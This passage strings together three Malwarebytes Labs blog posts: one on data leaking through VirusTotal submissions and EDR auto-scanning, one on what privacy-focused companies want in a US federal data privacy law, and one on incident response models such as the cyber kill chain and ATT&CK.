The use of VirusTotal API can also be dangerous. Bugs in the code or logic can easily cause a mass upload of private files. This is a danger whether you are building your own tools or using tools like WINJA, which automate submission of files to VT. The only recommendation here is to make sure the tools you are using are reputable or you have done your own independent code audits to make sure no bugs may lead to data leakage.

When it comes to using other reputable security tools, it is wise to read over all of the documentation and make sure you understand how and when the given tool will incorporate VT.

Case 3: VT email scanning service

I have unfortunately seen may articles and forum posts online where people have been giving advice to use the VT attachment scan service. Basically, by sending an email attachment to, the sender can receive a response as to what VT found regarding the attachment.

Please do not take such advice unless you are sure the document you are scanning contains no private data. It is a risky game. If you are worried about malicious documents infecting your computer, then the logical conclusion would be to buy an antivirus with a good reputation and the technology to block malicious documents.

If you choose to send all your potentially private emails to VT, searchable by anyone, then you’re essentially undoing any potential security or privacy benefits by exposing all your data anyway. What damage is a spyware going to do when you’ve already sent your sensitive data out to a public database?

EXE files problem

The next case I want to talk about, while less sensitive, is a lot more likely to be overlooked.

In a corporate environment, we cannot rely on everyone to manually submit attachments or files to security engineers—all of this is automated. From my past experience and from speaking with fellow security engineers, I have seen that it is quite common for all executables entering a corporate network to automatically get scanned with various plugins tied to a given platform. I will highlight Carbon Black, an enterprise antivirus program, in this case, although many other security providers have this problem as well.

When a new exe makes its way into a network, Carbon Black stores it, but also has the ability to cross reference the given file with various plugins and tools that are built in or added to the platform. For example, you can click a bubble on any given file in your network, which will give you its results against wildfire sandbox. And of course, the topic that has received so much heat in the media this year—the VT plugin.

Now, while they have fixed the issues on submitting documents to avoid leaking data, they still do submit exes. But wait, so what? Isn’t that exactly what we want it to do?

Correct, it is. Automation is what every corporation aims for in its security infrastructure. There is nothing wrong with the root idea of submitting and scanning exes flowing through the network. However, automation sometimes comes with a tradeoff if not properly planned.

I have evaluated the security infrastructure of many corporate networks and in these evaluations, I have seen that in this attempt to scan all new exes for malware, the company’s in-house executables end up getting scanned as well.

So now, confidential exes are unknowingly being exposed and leaking arguably more sensitive data and intellectual property. In addition, think for a moment about how software developers typically code. While they are testing functionality, it is common for a developer to hard code some credentials, paths, or other revealing information for a test build. Sure, after they are done, for the production build, it will likely get changed to hide this information and make it dynamic, but in the meantime, these demo builds have been picked up by the EDR and scanned through various plugins.

Again, this is not a problem with the EDR itself, it is a problem with its implementation, entirely the responsibility of the customer using the software.

Remediation and prevention

Now this does not mean we need to abandon use of security tools for fear of data leaks; it simply means we need to make some adjustments. So what can a business do to protect against leaking their own data to the public?

There are many options which will depend upon the compliance requirements and needs of a given company, but I have a few base considerations I recommend.

Rules-based segmentation

Rather than having a blanket automation where everything is automatically scanned, I always recommend segmenting the actions taken when the EDR sees a new file based on user groups. For example, maybe users in the developers’ group do not have their binaries residing in a specific directory sent for auto scanning.

However, this is easier said than done because just simply enabling this type of rule can be catastrophic and may essentially allow a developer free rein to secretly develop malware. That’s why, when one security rule is relaxed for a given user, another rule must be increased to make up for it. So in this theoretical scenario, we have just given a developer a free pass to not have his executables scanned. So we have closed one door but opened another.

To make up for this, one thought might be to keep heavy watch on the IPs and ports that the dev machines are allowed to communicate over. If the developer needs to communicate with a specific IP for his software, he should get approval in advance from the security engineers. At this point, we can let the developer go ahead and create malware, but if his MAC address or IP is seen attempting communication with a non pre-approved IP or over a non pre-approved port, fire alerts. This type of rule is trivial to create using a good EDR platform.

The roles and expected behavior of a given employee’s machine must be fully understood beforehand to be able to keep proper control over a network.

Understand the tools you use

It is important to understand that security tools are made for generic use. The creators do not know specifically what your company does and what your privacy policies are. They do not know whether you will be developing your own software onsite or whether you are simply using the tool to scan downloaded files.

That being said, it is up to you, the user or security engineer in charge of evaluating, to make sure you understand all of the functionality and options a tool gives you.

A developer who creates a tool to scan email attachments automatically with VT is not necessarily acting maliciously. For some users, maybe a user who specifically does not create and store info in documents, this might be the best tool in the world, exactly what they need to automate their operations. For another company who sends their contracts in the form of Word documents, this might be catastrophic. At the end of the day, the responsibility cannot be blamed on the tool that behaved exactly as advertised. It’s up to the user to do her own research and understand what the tool does and how it will effect privacy and security.

The post Caution: Misuse of security tools can turn against you appeared first on Malwarebytes Labs.

What should a US federal data privacy law ideally include?

In the constant David-and-Goliath struggle between digital privacy advocates and corporate privacy invaders, the question of how to legally protect Americans with a comprehensive, federal data privacy law provides conflicting answers. Advocates want protections, which Big Tech interprets as restrictions.

As of today, there is no one digital privacy law to rule them all. While a few state laws exist that protect consumer privacy here in the US, overarching federal legislation, such as the Global Data Privacy Regulation (GDPR) in Europe, has not yet penetrated the market.

US-based corporations must comply with GDPR if they have a global presence, but that’s only for their European customers—and many have found convenient workarounds. Who will protect the American user? Smaller tech? Privacy-forward tech? What about we-don’t-have-a-lobbying-war-chest tech? How do they feel about a federal privacy law?

For months, Malwarebytes Labs has reported on data privacy laws in the United States and abroad. But the question of federal legislation that applies to the entire country has gone unanswered, as multiple Senate proposals have yet to move forward.

Further, despite Big Tech’s recently-avowed commitment to regulation, those same companies are reportedly funding efforts to dismantle newly-enacted stateside data privacy protections.

But earlier this year, a group of tech companies stood opposed. They wanted to strengthen one of those same privacy protections. This tech group included some of the most recognizable company names in user privacy: DuckDuckGo, Ghostery, ProtonMail, Lavabit, Brave, Vivaldi, Purism, and Disconnect.

We asked those companies to broaden their sights beyond state legislation. What did they want, if anything, from a federal data privacy law for the United States?

What’s the goal?

For many of these privacy-forward companies, a federal data privacy law would be far from restrictive. Instead, it is considered necessary.

Todd Weaver is the founder and chief executive of Purism. He supports a federal data privacy law, so long as it isn’t stripped of meaningful user protections and doesn’t create barriers to success for startups and mid-sized companies. Federal legislation could be, Weaver said, the one way to finally defend the public from an ongoing digital privacy crisis.

“We’re talking about the exploitation of people in the digital world, and this is a giant problem,” Weaver said. He continued:

“The problem can be boiled down to things that nobody should ever know. Those are where people are, what people do, and who talks to whom.”

In the US, those pieces of information are far from protected, though. Where we are, what we do, and who we talk to fuels a massive corporate surveillance machine driven by social media behemoths, aggressive online tracking, and unseen data brokers, all motivated by continuously-climbing advertising revenue. No current law forbids much of this.

So how do we fix it? Here are a few ideas from privacy advocates.

Like the CCPA…but better

Last year, California’s then-governor Jerry Brown signed the California Consumer Privacy Act (CCPA). Effective January 1, 2020, the CCPA grants Californians the rights to know what data is collected on them, whether that data is sold, the option to opt out of those sales, and the right to access that data.

In April, privacy search engine DuckDuckGo, joined by 23 other technology companies, sent a letter to the California Assembly’s Privacy Committee asking that the law be bolstered. The requested improvements, DuckDuckGo wrote, would include the right to opt out of having information shared—not just sold—and the right to sue companies that violated any privacy provision of the CCPA.

Helen Horstmann-Allen, chief operating officer at email provider Fastmail (which signed onto DuckDuckGo’s letter) said she would appreciate seeing legislation similar to CCPA go national.

“We were pleased to see California take the lead with their privacy laws to reflect how companies do business today. Expanding the scope of privacy legislation recognizes that companies don’t need to sell data to violate consumer privacy,” Horstmann-Allen said. “We’d love to see this type of legislation move on the national level as well. Privacy rights shouldn’t end at the state line.”

Jeremy Tillman, director of product at the ad-blocking browser extension Ghostery, made similar comments in a 2018 opinion piece for The Hill:

“If there is serious traction for federal consumer privacy legislation, which there absolutely should be, the California Consumer Protection law can serve as a solid template to model future laws after.”

A consumer’s right to sue for privacy violations

California’s privacy law received a major setback this year when a proposed amendment did not pass one of the state’s Senate committees. The amendment, SB 561, would have given Californians the right to sue a company that violated any privacy rights described in the CCPA.

Currently, CCPA only gives Californians the right to sue a company for the harm of a data breach. Though a novel inclusion when compared to the dearth of privacy protections across the nation, some argue that broader opportunities to go to court are needed.  

“If you can’t sue or do anything to go after these companies that are committing these atrocities, where does that leave us?” Weaver said. “We’ve already seen that with the CCPA in California.”

At least 40 bills have been introduced in California with the near-uniform purpose to amend the CCPA into a weaker version of itself. AB 846, for example, would have limited the CCPA’s discrimination prohibition. AB 873 would have pared down the definition of individuals’ personal information.

More attempts to weaken the CCPA remain, Weaver said.

“One of those bills is just about defanging the entire regulation,” Weaver said. “If you do that, if you defang, [the law] is just paper.”

Transparent data collection practices

Ghostery’s Tillman echoed the above sentiments that any federal data privacy legislation should “hold big tech accountable for their deceptive data collection practices,” but he added:

“[It] should require that any data collection occur as part of a transparent, easy-to-understand transaction where the cost to consumers is clear, enabling them to be knowing and voluntary participants in an ad-supported and data-driven economy.”

Design for interoperability with GDPR

Johnny Ryan, chief policy officer for the privacy-focused web browser Brave, testified earlier this year before the US Senate Judiciary Committee about a potential federal data privacy law. Such a law, Ryan said, should hew closely to the standards of a popular, across-the-pond framework: the European Union’s General Data Protection Regulation (GDPR).

“We view the GDPR as essential,” Ryan said in an email to Malwarebytes Labs. “It can establish the conditions to allow young, innovative companies like ours to flourish.”

Ryan told the committee that two elements within the GDPR can help both protect Americans’ data and give opportunities for small companies to meaningfully compete with Silicon Valley’s biggest, most entrenched businesses. Those two provisions are the “purpose limitation” principle—which protects people’s data from being used in ways they could not anticipate—and the ability to easily opt out of a company’s data collection.

“These two GDPR tools, the ‘purpose limitation principle’, plus the ease of withdrawal of consent, enable freedom,” Ryan told the committee. “Freedom for the market of users to softly ‘break up’—and ‘un-break up’—big tech companies by deciding what personal data can be used for.”

Further, Ryan said to Malwarebytes Labs, a US federal data privacy law inspired by GDPR—particularly in defining concepts like personal data, opt-in consent, and profiling—will provide technology companies with a streamlined path toward compliance, since many have already worked toward complying with GDPR.

“The standard of protection in a federal privacy law, and the definition of key concepts and tools in it, should therefore be compatible and interoperable with the emerging GDPR de facto standard that is being adopted globally,” Ryan said.

Do not undermine states’ individual data privacy laws

Ever since Americans learned about a European consultancy’s effort to sway the 2016 US Presidential election by harvesting the Facebook data of tens of millions of non-consenting users, individual US states have clamped down hard on data misuse against their residents.

California passed the CCPA. Vermont passed a law regulating data brokers. Maine passed a law placing restrictions on how Internet service providers share Mainers’ personal information.

But those state laws could be in trouble if a federal data privacy law calls for their nullification. Such a provision exists in both Senator Marco Rubio’s data privacy bill and in the draft privacy legislation written by Center for Democracy and Technology.

This superseding provision—called “pre-emption”—is unacceptable to Brave.

“The federal law should be of equal or higher standard to state laws, and should not undermine state laws,” Ryan said.

A “Digital Bill of Rights”

When explaining what he would like to see in a federal privacy bill, Weaver repeatedly returned to the idea of a “Digital Bill of Rights.” It is an idea his company has already acted on, having written out and implemented several of the principles.

Included in the company’s Digital Bill of Rights are:

  • The right to change providers
    • Users can take all their data and move it to another service
  • The right to protect personal data
    • Users “own and control” the master keys to encrypt their data
  • The right to verify
    • Users can analyze the source code of software operating locally on their machines
  • The right to not be tracked
    • Users know about and have access to all the collections and uses of their data
    • Users can “obtain, correct, or permanently delete personal data”
    • User data that is collected for a purpose is deleted after that purpose is fulfilled
  • The right to access
    • Users will not be “discriminated against nor exploited based on personal data”

A digital bill of rights is a rare find for any technology company, but Weaver explained that Purism is not guided by the same rules as Big Tech. Instead, because Purism has incorporated as a “social purpose company,” it is not obliged to maximize shareholder value. Instead, it is obliged to fulfill the principles written in its articles of incorporation.

Those “Purist Principles,” Weaver explained, guide the company every day.

“It allows everyone, including me, our employees, to advance our causes before caring about profits or maximizing shareholder value,” Weaver said.

One last, important aspect about the rights described in the Purist Principles is that none of them can be removed by a company’s terms of service.

“If this was established at the federal level,” Weaver said, “this is saying ‘These are your rights, and nobody can remove these rights inside a Terms of Service [agreement] that nobody reads.’”

The post What should a US federal data privacy law ideally include? appeared first on Malwarebytes Labs.

Enterprise incident response: getting ahead of the wave

Enterprise defenders have a tough job. In contrast to small businesses, large enterprise can have thousands of endpoints, legacy hardware from mergers and acquisitions, and legacy apps that are business critical and prevent timely patching. Add to that a deluge of indicators and metadata from the perimeter that may represent the early stages of a devastating attack—or may be nothing at all.

So how do network defenders get out from behind the 8-ball? How do leaders bring an effective strategy to bear in mobilizing incident response (IR) resources? To deal with knotty problems like this, security researchers have developed a number of IR models to help bring a maximally sane, efficient strategy to network defense efforts.

The cyber kill chain

In 2011, Lockheed Martin developed the cyber kill chain. Borrowed from the US military, the kill chain essentially breaks most cyberattacks down to their constituent elements, and theorizes that forcing a hard stop to any of the seven phases will prevent the entire attack. So if an attack is caught at the installation phase and remediated, the attacker can no longer proceed to act on objectives. But if endpoint protection can stop an attack at the delivery phase, so much the better.

The general idea that makes the kill chain such an appealing way of looking at an attack is that you can’t block everything. Malspam will get through perimeter defenses. Reconnaissance will sometimes happen whether you like it or not. Exploitation will definitely happen with that one employee who is committed to clicking on everything.

So rather than throwing up a Maginot line of ever-increasing defenses at ever-escalating costs, the kill chain suggests that defenders have seven opportunities to shut down an attack, and can fight on a battlefield of their choosing. While it would be best to identify an attack at the Reconnaissance phase, killing it at the Delivery phase can keep the network just as safe, without burning out your SOC by expecting them to catch everything. Check out some more details on how the kill chain is implemented here.

The ATT&CK model

A somewhat more granular model, ATT&CK is a matrix that maps a lengthy list of attacker capabilities to a 12-step attack chain. Often seen as a complement to the kill chain, the ATT&CK can be a useful exercise to match TTPs already observed to attack chain phases to determine defense priorities. When looking at use cases for the model, threat data sharing is one of the most useful. Mapping out a full matrix of observed TTPs can be a method to quickly share a snapshot of the threat landscape across multiple defensive groups or different organizations.

Critiques of IR models

Most critiques of the kill chain and its more recent variants boil down to “what about X?” This is a little bit misguided, as attacker capabilities change over time, and a comprehensive matrix of TTPs would be exhausting to look at, and probably inaccurate in some way. What these models are really meant to assist with is bringing threat intelligence and strategy into the SOC to eliminate blind reactivity. Using any strategic model at all can bring better results than blind monitoring.

Intelligence: the bigger point

The takeaway for the SOC leader or CISO looking to implement an IR model is not picking the one, singularly correct model. Rather, implementing strategic defense in any form can boost the SOC’s responsiveness, efficiency, and accuracy. Having a well-mapped matrix tying observed indicators to specific attack phases can be an aid in prioritizing responses, as well as judging severity for a successful attack caught midstream.

Most importantly, having an incident response model forces SOC staff to respond to an incident in a strategic manner, addressing threats furthest along an attack chain first, and using threat staging to derive intelligence on potential ongoing attacks. As with conventional warfare, beating back attacks and winning the war depends on having a plan.

Stay vigilant, and stay safe.

The post Enterprise incident response: getting ahead of the wave appeared first on Malwarebytes Labs.